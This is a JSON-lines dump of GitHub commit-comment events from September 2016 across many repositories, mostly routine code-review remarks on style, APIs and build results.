{"id":"4568974899","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19038992,"position":15,"line":308,"path":"core/descriptors/src/org/jetbrains/kotlin/types/ErrorUtils.java","commit_id":"f20c9f88343220ea1640d395b3e1fbd3247ae4da","created_at":"2016-09-15T15:52:37Z","updated_at":"2016-09-15T15:52:37Z","body":"Alignment looks a bit strange"}},"created_at":"2016-09-15T15:52:37Z"}
{"id":"4568978398","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"jacksonbrodeur/react-starter"},"payload":{"comment":{"id":19039002,"position":8,"line":7,"path":"src/reducer.js","commit_id":"420ba0b1e869d501cc086120f2f0f1892cc86e9f","created_at":"2016-09-15T15:53:13Z","updated_at":"2016-09-15T15:53:13Z","body":"You can eliminate the need for the `isFirstSearch` variable by setting your initial state for `results` to `null`.\r\n\r\n    null // same as isFirstSearch: true\r\n    [] // no results, isFirstSearch: false\r\n    [{}, ...] // results, isFirstSearch: false"}},"created_at":"2016-09-15T15:53:13Z"}
{"id":"4568980104","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19039006,"position":null,"line":null,"path":null,"commit_id":"87148bb7110ed54ef50f0660dfe0a735cdede3ca","created_at":"2016-09-15T15:53:27Z","updated_at":"2016-09-15T15:53:27Z","body":"Great job @remitamine !"}},"created_at":"2016-09-15T15:53:27Z"}
{"id":"4568981053","type":"CommitCommentEvent","actor":{"login":"grisaitis"},"repo":{"name":"TuragaLab/PyGreentea"},"payload":{"comment":{"id":19039009,"position":4,"line":66,"path":"data_io/dataset_reading.py","commit_id":"50be17ebcbee787ac87555fcb25db6aa8a52d2e9","created_at":"2016-09-15T15:53:37Z","updated_at":"2016-09-15T15:53:37Z","body":"one consequence of this change is that we are defining mask differently now when `'mask'` is not provided in `original_dataset`. In that case, what we used to do was: 1. determine the components_array 2. infer mask from components. This way, any erosion that happened in components was reflected in the mask. \r\n\r\nHere though, mask_array is defined before components_array is eroded. As a result, components is more eroded than the mask. Effectively, the mask is dilated automatically relative to the components. I think this is usually what we want when the mask isn't provided - e.g. training on large DVID volumes - but (a) it's not obvious in the code and (b) we don't always want this behavior necessarily.  \r\n\r\nAgain, this is not a concern for when `'mask'` is provided in the source data. "}},"created_at":"2016-09-15T15:53:37Z"}
{"id":"4568981544","type":"CommitCommentEvent","actor":{"login":"wangxuemin"},"repo":{"name":"ideawu/ssdb"},"payload":{"comment":{"id":19039010,"position":null,"line":null,"path":null,"commit_id":"dd2b9dabdbdb91ab06fb2dc77e88c61b19a28325","created_at":"2016-09-15T15:53:42Z","updated_at":"2016-09-15T15:53:42Z","body":"good"}},"created_at":"2016-09-15T15:53:42Z"}
{"id":"4568982316","type":"CommitCommentEvent","actor":{"login":"rlewis1988"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19039011,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:53:50Z","updated_at":"2016-09-15T15:53:50Z","body":"For what it's worth, I agree that\r\n```\r\nobtain (a, b, c) := p1 in\r\na + b + c\r\n```\r\nsounds a little strange. Not fatally strange or anything, but it doesn't read naturally to me."}},"created_at":"2016-09-15T15:53:50Z"}
{"id":"4568983316","type":"CommitCommentEvent","actor":{"login":"jmoody"},"repo":{"name":"calabash/calabash-android"},"payload":{"comment":{"id":19039013,"position":4,"line":40,"path":"ruby-gem/calabash-android.gemspec","commit_id":"83ca20fdbc599fe5928a6a70846d9fab1250671e","created_at":"2016-09-15T15:53:59Z","updated_at":"2016-09-15T15:53:59Z","body":"@TobiasRoikjer This should be a development dependency.  The luffa gem exists to help with testing and in CI."}},"created_at":"2016-09-15T15:53:59Z"}
{"id":"4568983777","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19039016,"position":null,"line":null,"path":null,"commit_id":"af503135c3e4c7e9793876edd5641f850ff00261","created_at":"2016-09-15T15:54:05Z","updated_at":"2016-09-15T15:54:05Z","body":"Compiler should be smart enough to generate identical code.\r\nBut `return 0;` is far from `condition`, making it harder to read the code.\r\n\r\nWith \r\n```\r\nif(!condition)\r\n  return 0;\r\n// All the code that does stuff...\r\n...\r\n```\r\nIt is easy to see that `!condition` branch is early abort, you don't need to remember it when reading rest of code.\r\n\r\n"}},"created_at":"2016-09-15T15:54:05Z"}
{"id":"4568983978","type":"CommitCommentEvent","actor":{"login":"jmoody"},"repo":{"name":"calabash/calabash-android"},"payload":{"comment":{"id":19039018,"position":2,"line":2,"path":"ruby-gem/lib/calabash-android/dependencies.rb","commit_id":"83ca20fdbc599fe5928a6a70846d9fab1250671e","created_at":"2016-09-15T15:54:08Z","updated_at":"2016-09-15T15:54:08Z","body":"Ditto."}},"created_at":"2016-09-15T15:54:08Z"}
{"id":"4568984202","type":"CommitCommentEvent","actor":{"login":"kenhunt"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19039019,"position":null,"line":null,"path":null,"commit_id":"e74648a10bfdb8199adcacebe2e04ef449eab02a","created_at":"2016-09-15T15:54:10Z","updated_at":"2016-09-15T15:54:10Z","body":"/me doot doots"}},"created_at":"2016-09-15T15:54:10Z"}
{"id":"4568987281","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"audxo14/Network"},"payload":{"comment":{"id":19039029,"position":46,"line":33,"path":"pcap_test/pcap_test.cpp","commit_id":"81d57d5fd269248772506b5d6d7cc49f6caaeaac","created_at":"2016-09-15T15:54:39Z","updated_at":"2016-09-15T15:54:39Z","body":"0x0800 > ETHERTYPE_IP\r\nWrong comment. 0X0800 value is IP not Ethernet."}},"created_at":"2016-09-15T15:54:39Z"}
{"id":"4568989386","type":"CommitCommentEvent","actor":{"login":"sgress454"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19039035,"position":10,"line":10,"path":"lib/get-filepath-from-stack-entry.js","commit_id":"b2f8d29cc36fa5daaa53fc4cccf3143687303bf1","created_at":"2016-09-15T15:54:59Z","updated_at":"2016-09-15T15:54:59Z","body":"This is the regex from felixge's [stack-trace](https://github.com/felixge/node-stack-trace) module, modified by me to account for spaces in directory names, and the possible existence of `[as xyz]` in the entries.  Tested with Node 0.10, 0.12, 4, 5 and 6.   Didn't test _directly_ on Windows, but faked it by transforming paths in a test trace into Windows-style and using `path.win32` methods."}},"created_at":"2016-09-15T15:54:59Z"}
{"id":"4568989736","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"audxo14/Network"},"payload":{"comment":{"id":19039037,"position":58,"line":42,"path":"pcap_test/pcap_test.cpp","commit_id":"81d57d5fd269248772506b5d6d7cc49f6caaeaac","created_at":"2016-09-15T15:55:03Z","updated_at":"2016-09-15T15:55:03Z","body":"6 > IPPROTO_TCP"}},"created_at":"2016-09-15T15:55:03Z"}
{"id":"4568991257","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19039040,"position":null,"line":null,"path":null,"commit_id":"4eb799560ccf340c3ec8313069c97f137c1e4a68","created_at":"2016-09-15T15:55:19Z","updated_at":"2016-09-15T15:55:19Z","body":"Please don't use the online github editor"}},"created_at":"2016-09-15T15:55:19Z"}
{"id":"4568992766","type":"CommitCommentEvent","actor":{"login":"cxd19891121"},"repo":{"name":"cxd19891121/Eims-0913-git"},"payload":{"comment":{"id":19039046,"position":null,"line":null,"path":null,"commit_id":"cfbd23a06b914c6e1b597070e987cc9e588d5e6b","created_at":"2016-09-15T15:55:33Z","updated_at":"2016-09-15T15:55:33Z","body":"LGTM\r\n"}},"created_at":"2016-09-15T15:55:33Z"}
{"id":"4568992882","type":"CommitCommentEvent","actor":{"login":"jmoody"},"repo":{"name":"calabash/calabash-android"},"payload":{"comment":{"id":19039047,"position":186,"line":186,"path":"ruby-gem/lib/calabash-android/dependencies.rb","commit_id":"83ca20fdbc599fe5928a6a70846d9fab1250671e","created_at":"2016-09-15T15:55:34Z","updated_at":"2016-09-15T15:55:34Z","body":"Ah!!! The Luffa::Version.  Awesome!\r\n\r\nI wanted to create a separate gem for this because this is a duplicate implementation of RunLoop::Version.\r\n\r\nThe existing versioning gems are not quite right for us."}},"created_at":"2016-09-15T15:55:34Z"}
{"id":"4568995340","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19039054,"position":null,"line":null,"path":null,"commit_id":"af503135c3e4c7e9793876edd5641f850ff00261","created_at":"2016-09-15T15:55:58Z","updated_at":"2016-09-15T15:55:58Z","body":"This style works great when used as error handling/input check. There can be multiple (abort/bailout/do nothing) conditions at identical level, avoiding deep nesting"}},"created_at":"2016-09-15T15:55:58Z"}
{"id":"4568995375","type":"CommitCommentEvent","actor":{"login":"rcuhljr"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":19039055,"position":13,"line":664,"path":"dependency.lic","commit_id":"6a14bfbb876e46e7767db0105ea28e64948589fb","created_at":"2016-09-15T15:55:58Z","updated_at":"2016-09-15T15:55:58Z","body":":+1: "}},"created_at":"2016-09-15T15:55:58Z"}
{"id":"4568997158","type":"CommitCommentEvent","actor":{"login":"rvock"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19039061,"position":null,"line":null,"path":null,"commit_id":"7154631c28981f1e1b67958c8ea6a46210fb17fa","created_at":"2016-09-15T15:56:18Z","updated_at":"2016-09-15T15:56:18Z","body":"You're still missing a /u for the first preg_replace. If the String contains a non-breakin-space, convertToSafeString will return an empty string.\r\n\r\nI hope I'll find some time during the weekend to update the test-setup of #220, so they can run using travis as described in https://github.com/helhum/ext_scaffold"}},"created_at":"2016-09-15T15:56:18Z"}
{"id":"4568998332","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19039064,"position":27,"line":235,"path":"californium-core/src/main/java/org/eclipse/californium/core/CoapServer.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:56:28Z","updated_at":"2016-09-15T15:56:28Z","body":"It's a pathetic attempt to make the executor shut down finally once all tasks (even the ones scheduled for a later time) have been executed. But since this doesn't seem to help anyways, we might also remove the code for running the tasks again ..."}},"created_at":"2016-09-15T15:56:28Z"}
{"id":"4569002581","type":"CommitCommentEvent","actor":{"login":"btfrise"},"repo":{"name":"Rise-Vision/risevision-documentation"},"payload":{"comment":{"id":19039070,"position":14,"line":177,"path":"_posts/user/2015-06-16-create-a-display.md","commit_id":"b7a2737bacf2cd8c81e8ef05809c7953b50de918","created_at":"2016-09-15T15:57:14Z","updated_at":"2016-09-15T15:57:14Z","body":"@alanclayton It does not work when you search in the chrome web store, but you can search for the displayID in the Manage Kiosk Apps dialog, which is what these instructions are for."}},"created_at":"2016-09-15T15:57:14Z"}
{"id":"4569003887","type":"CommitCommentEvent","actor":{"login":"jwillemsen"},"repo":{"name":"GaryN4/ACE_TAO"},"payload":{"comment":{"id":19039074,"position":null,"line":null,"path":null,"commit_id":"6cfd75bc1a5c717739f37a369ab82be4089c1a3d","created_at":"2016-09-15T15:57:26Z","updated_at":"2016-09-15T15:57:26Z","body":"Good catch, could you extend ACE/tests/Time_Value_Test.cpp with a test case that fails without your fix, that way we know for sure it never gets introduced back. When you have done that, please make a pull request so that we can merge this into ACE_TAO"}},"created_at":"2016-09-15T15:57:26Z"}
{"id":"4569005888","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19039080,"position":7,"line":7,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T15:57:44Z","updated_at":"2016-09-15T15:57:44Z","body":"%pylab inline"}},"created_at":"2016-09-15T15:57:44Z"}
{"id":"4569005907","type":"CommitCommentEvent","actor":{"login":"rhyshort"},"repo":{"name":"cloudant/swift-cloudant"},"payload":{"comment":{"id":19039081,"position":8,"line":420,"path":"Source/URLSession.swift","commit_id":"b6e689a6b5c5ab35c430f097974958709f9f1459","created_at":"2016-09-15T15:57:44Z","updated_at":"2016-09-15T15:57:44Z","body":"dam, I feel like my typing is all over the shop today, corrected in 4c6cb36"}},"created_at":"2016-09-15T15:57:44Z"}
{"id":"4569010151","type":"CommitCommentEvent","actor":{"login":"planrich"},"repo":{"name":"vmprof/vmprof-server"},"payload":{"comment":{"id":19039089,"position":null,"line":null,"path":null,"commit_id":"77c67fe358b3d32844069434b8c2a154d80e6346","created_at":"2016-09-15T15:58:26Z","updated_at":"2016-09-15T15:58:26Z","body":"I really moves some fields around to make this whole setup more maintainable as vmprof grows. Still working on the migration. There is now the RuntimeData providing the means to access all profiles (cpu, memory, jitlog). "}},"created_at":"2016-09-15T15:58:26Z"}
{"id":"4569011342","type":"CommitCommentEvent","actor":{"login":"stefanklein"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19039093,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-15T15:58:36Z","updated_at":"2016-09-15T15:58:36Z","body":"I agree. this error should be prevented (or at least detected) in cmake already. stefan\r\n\r\nOn 15-09-2016 16:35, FBerendsen wrote:\r\n\r\nOk we could do that, but I think the reasoning is a bit odd. Can't we force the user to use C++11 via Cmake? (We do set those flags ourselves in the SuperBuild). We are depending on C++11 anyways, it is a prerequisite.\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/kaspermarstal/SuperElastix/commit/7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7#commitcomment-19037441>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAultRJRw9rz5Ivxq7OryFPbfgiv3km7ks5qqVejgaJpZM4J9t_Z>.\r\n\r\n\r\n--\r\nStefan Klein\r\n+31 10 7043442\r\nhttp://www.bigr.nl/people/StefanKlein\r\n"}},"created_at":"2016-09-15T15:58:36Z"}
{"id":"4569013070","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039095,"position":13,"line":13,"path":"server/db/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T15:58:53Z","updated_at":"2016-09-15T15:58:53Z","body":"If you want to disable an eslint rule for multiple lines, you can use the following pattern:\r\n\r\n```js\r\n/* eslint-disable no-unused-vars */\r\nfoo = bar;\r\nbaz = qux;\r\n/* eslint-enable no-unused-vars */\r\n```"}},"created_at":"2016-09-15T15:58:53Z"}
{"id":"4569013091","type":"CommitCommentEvent","actor":{"login":"AustinSaintAubin"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19039096,"position":null,"line":null,"path":null,"commit_id":"af503135c3e4c7e9793876edd5641f850ff00261","created_at":"2016-09-15T15:58:53Z","updated_at":"2016-09-15T15:58:53Z","body":"Ok, thanks for the explanation. I personally prefer the nested style, but my code is usually small. I understand the need for having an (abort/bailout/do nothing) condition at the start as to shorten the code. Just was not sure if I was missing anything. Thanks for the explanation on styles."}},"created_at":"2016-09-15T15:58:53Z"}
{"id":"4569013582","type":"CommitCommentEvent","actor":{"login":"aborg0"},"repo":{"name":"Logiqx/parso"},"payload":{"comment":{"id":19039099,"position":null,"line":null,"path":null,"commit_id":"e2ca4182be224c0a1e9495109e4538cfa545d7a9","created_at":"2016-09-15T15:58:58Z","updated_at":"2016-09-15T15:58:58Z","body":"May I ask your opinion on [my approach](https://github.com/epam/parso/blob/d9dbd486ab7a82fd54f1895f4029d3277f611ddd/src/main/java/com/epam/parso/impl/SasFileConstants.java#L794) of date and time handing? (The last four lines in this change are not covered by my code.)"}},"created_at":"2016-09-15T15:58:58Z"}
{"id":"4569015001","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19039101,"position":56,"line":56,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T15:59:15Z","updated_at":"2016-09-15T15:59:15Z","body":"Dont need to explicitly write \":\" for other axis if you index axis 0. \r\nmyInput = data[1000] that is enough"}},"created_at":"2016-09-15T15:59:15Z"}
{"id":"4569016854","type":"CommitCommentEvent","actor":{"login":"maparent"},"repo":{"name":"bbangert/beaker"},"payload":{"comment":{"id":19039103,"position":13,"line":318,"path":"beaker/util.py","commit_id":"a956724df00173947f246fb3cdc5fb03782a3e46","created_at":"2016-09-15T15:59:31Z","updated_at":"2016-09-15T15:59:31Z","body":"This fails if timeout is not defined in the opts. I suggest\r\nif opts.get('timeout', None) is not None and not opts.get('save_accessed_time', None):\r\n"}},"created_at":"2016-09-15T15:59:31Z"}
{"id":"4569018920","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"audxo14/Network"},"payload":{"comment":{"id":19039108,"position":26,"line":39,"path":"pcap_test/main.cpp","commit_id":"81d57d5fd269248772506b5d6d7cc49f6caaeaac","created_at":"2016-09-15T15:59:51Z","updated_at":"2016-09-15T15:59:51Z","body":"When pcap_next_ex returns 0(zero), you should not call pcap_test function because 0 means timeout(no packet captured). for more information, http://www.tcpdump.org/manpages/pcap_next_ex.3pcap.html .\r\n"}},"created_at":"2016-09-15T15:59:51Z"}
{"id":"4569020304","type":"CommitCommentEvent","actor":{"login":"sampsongao"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19039113,"position":4,"line":4,"path":"src/node_jsvmapi_types.h","commit_id":"d167e60950ea4219228acd54a30702540f77953a","created_at":"2016-09-15T16:00:07Z","updated_at":"2016-09-15T16:00:07Z","body":"Are you commenting on line #4?"}},"created_at":"2016-09-15T16:00:07Z"}
{"id":"4569029539","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039139,"position":13,"line":13,"path":"issue11-2/edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:01:35Z","updated_at":"2016-09-15T16:01:35Z","body":"ここは使っていないかも?\r\n\r\nidとnameではなく、\r\nidだけクエリパラメーターに渡す→\r\nidに一致するnameをデータベースから検索→\r\n「変更する名前」の箇所で表示する\r\n\r\nという実装もありますね(どちらでもOKな実装だと思います)。"}},"created_at":"2016-09-15T16:01:35Z"}
{"id":"4569029804","type":"CommitCommentEvent","actor":{"login":"Crinsane"},"repo":{"name":"Crinsane/LaravelShoppingcart"},"payload":{"comment":{"id":19039141,"position":null,"line":null,"path":null,"commit_id":"95b46c59dd4060d741466cf3b4d677887cc3daeb","created_at":"2016-09-15T16:01:37Z","updated_at":"2016-09-15T16:01:37Z","body":"Yes it is"}},"created_at":"2016-09-15T16:01:37Z"}
{"id":"4569033543","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19039151,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T16:02:15Z","updated_at":"2016-09-15T16:02:15Z","body":"My only concern would be that the re-sizing of the map would happen quite frequently in a real life scenario where many clients connect. And since resizing seems to be quite expensive in case of `ConcurrentHashMap` I thought it might be a good idea to pre-initialize it to a certain capacity."}},"created_at":"2016-09-15T16:02:15Z"}
{"id":"4569034005","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039154,"position":36,"line":36,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:02:19Z","updated_at":"2016-09-15T16:02:19Z","body":"good job using catch(next)"}},"created_at":"2016-09-15T16:02:19Z"}
{"id":"4569035643","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039155,"position":23,"line":23,"path":"server/db/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:02:33Z","updated_at":"2016-09-15T16:02:33Z","body":"I like that your join table has its own columns."}},"created_at":"2016-09-15T16:02:33Z"}
{"id":"4569038572","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19039160,"position":4,"line":7,"path":"js/src/main/scala/NodejsCEK.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-15T16:03:01Z","updated_at":"2016-09-15T16:03:01Z","body":"probably not needed"}},"created_at":"2016-09-15T16:03:01Z"}
{"id":"4569039474","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039163,"position":16,"line":16,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:03:12Z","updated_at":"2016-09-15T16:03:12Z","body":"$namebefore は使っていないかも?"}},"created_at":"2016-09-15T16:03:12Z"}
{"id":"4569040383","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19039165,"position":null,"line":null,"path":null,"commit_id":"da322a42f8fdcffa8aa235f0ceb77eb6f82d9cb1","created_at":"2016-09-15T16:03:21Z","updated_at":"2016-09-15T16:03:21Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#N04S98FTRny9I2FvDoDaEw"}},"created_at":"2016-09-15T16:03:21Z"}
{"id":"4569041544","type":"CommitCommentEvent","actor":{"login":"jwillemsen"},"repo":{"name":"GaryN4/ACE_TAO"},"payload":{"comment":{"id":19039166,"position":null,"line":null,"path":null,"commit_id":"6cfd75bc1a5c717739f37a369ab82be4089c1a3d","created_at":"2016-09-15T16:03:31Z","updated_at":"2016-09-15T16:03:31Z","body":"Looks this is intentional, see https://github.com/DOCGroup/ACE_TAO/commit/4ca0a6504ae7f533d932451292f8bf6573be605b"}},"created_at":"2016-09-15T16:03:31Z"}
{"id":"4569043672","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19039171,"position":5,"line":47,"path":"jvm/src/main/scala/RhinoToQuark.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-15T16:03:51Z","updated_at":"2016-09-15T16:03:51Z","body":"Can you explain what this is about?"}},"created_at":"2016-09-15T16:03:51Z"}
{"id":"4569045296","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039175,"position":18,"line":18,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:04:09Z","updated_at":"2016-09-15T16:04:09Z","body":"(今の時点では) $namedeleteも使っていないかな？"}},"created_at":"2016-09-15T16:04:09Z"}
{"id":"4569045643","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"audxo14/Network"},"payload":{"comment":{"id":19039177,"position":10,"line":9,"path":"pcap_test/Makefile","commit_id":"d9eeeeb21d258a7cf1ed77632aea94b8b22059cf","created_at":"2016-09-15T16:04:12Z","updated_at":"2016-09-15T16:04:12Z","body":"While compiling a specific source code with \"-c\" option, you don't need to add \"-lpcap\" option. \"-l...\" option only has to be added in linking process."}},"created_at":"2016-09-15T16:04:12Z"}
{"id":"4569046838","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19039182,"position":16,"line":203,"path":"jvm/src/main/scala/RhinoToQuark.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-15T16:04:24Z","updated_at":"2016-09-15T16:04:24Z","body":"Yeah, good enough. I guess this doesn't let you write array.map(eval), but who cares?"}},"created_at":"2016-09-15T16:04:24Z"}
{"id":"4569046851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19039183,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T16:04:24Z","updated_at":"2016-09-15T16:04:24Z","body":"versionNumbers (mitchute) - x86_64-MacOS-10.9-clang: OK (2330 of 2330 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T16:04:24Z"}
{"id":"4569048780","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039185,"position":21,"line":21,"path":"issue11-2/update-edit.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:04:43Z","updated_at":"2016-09-15T16:04:43Z","body":"ここをSQLインジェクション対策をした書き方に変えるとどうなりますでしょうか？"}},"created_at":"2016-09-15T16:04:43Z"}
{"id":"4569049049","type":"CommitCommentEvent","actor":{"login":"loskutov"},"repo":{"name":"CTDElite/computational-methods-hw3"},"payload":{"comment":{"id":19039186,"position":33,"line":33,"path":"src/main/java/ru/ifmo/ctddev/segal/hw3/ResultBuilder.java","commit_id":"036a23365ed4276be6af193996197def123e12a5","created_at":"2016-09-15T16:04:45Z","updated_at":"2016-09-15T16:04:45Z","body":"Why not just `Collections.unmodifiableList(xs)`?"}},"created_at":"2016-09-15T16:04:45Z"}
{"id":"4569051061","type":"CommitCommentEvent","actor":{"login":"gitricke"},"repo":{"name":"heroku/php-getting-started"},"payload":{"comment":{"id":19039193,"position":null,"line":null,"path":null,"commit_id":"86c5c49147af5b6ce67d873e5132e4ef3ea7090f","created_at":"2016-09-15T16:05:05Z","updated_at":"2016-09-15T16:05:05Z","body":"commit manuale sulla pagina"}},"created_at":"2016-09-15T16:05:05Z"}
{"id":"4569051888","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19039195,"position":13,"line":56,"path":"shared/src/main/scala/Syntax.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-15T16:05:15Z","updated_at":"2016-09-15T16:05:15Z","body":"huh?"}},"created_at":"2016-09-15T16:05:15Z"}
{"id":"4569054317","type":"CommitCommentEvent","actor":{"login":"aganita"},"repo":{"name":"hannahlorane/polished"},"payload":{"comment":{"id":19039200,"position":44,"line":44,"path":"server/app/routes/members/index.js","commit_id":"291484fe293fe23bbccc6c958e7fcc3b358977ba","created_at":"2016-09-15T16:05:37Z","updated_at":"2016-09-15T16:05:37Z","body":"here you may want to use findOrCreate instead of create "}},"created_at":"2016-09-15T16:05:37Z"}
{"id":"4569062403","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039222,"position":19,"line":19,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:06:49Z","updated_at":"2016-09-15T16:06:49Z","body":"$namebefore、$nameafter、$namedeleteは使っていないかな？"}},"created_at":"2016-09-15T16:06:49Z"}
{"id":"4569062850","type":"CommitCommentEvent","actor":{"login":"enohense8818"},"repo":{"name":"enohense8818/datasciencecoursera"},"payload":{"comment":{"id":19039224,"position":null,"line":null,"path":null,"commit_id":"76316071d8fdda581e6251261939d65eb283e8ff","created_at":"2016-09-15T16:06:54Z","updated_at":"2016-09-15T16:06:54Z","body":"https://github.com/enohense8818/datasciencecoursera/blob/master/HelloWorld.md"}},"created_at":"2016-09-15T16:06:54Z"}
{"id":"4569063813","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19039225,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-15T16:07:04Z","updated_at":"2016-09-15T16:07:04Z","body":"こちらもSQLインジェクション対策で書いてみましょう！"}},"created_at":"2016-09-15T16:07:04Z"}
{"id":"4569065504","type":"CommitCommentEvent","actor":{"login":"itegulov"},"repo":{"name":"CTDElite/computational-methods-hw3"},"payload":{"comment":{"id":19039232,"position":33,"line":33,"path":"src/main/java/ru/ifmo/ctddev/segal/hw3/ResultBuilder.java","commit_id":"036a23365ed4276be6af193996197def123e12a5","created_at":"2016-09-15T16:07:22Z","updated_at":"2016-09-15T16:07:22Z","body":"Should be moved to `Result#Result(x, y, z, t)`."}},"created_at":"2016-09-15T16:07:22Z"}
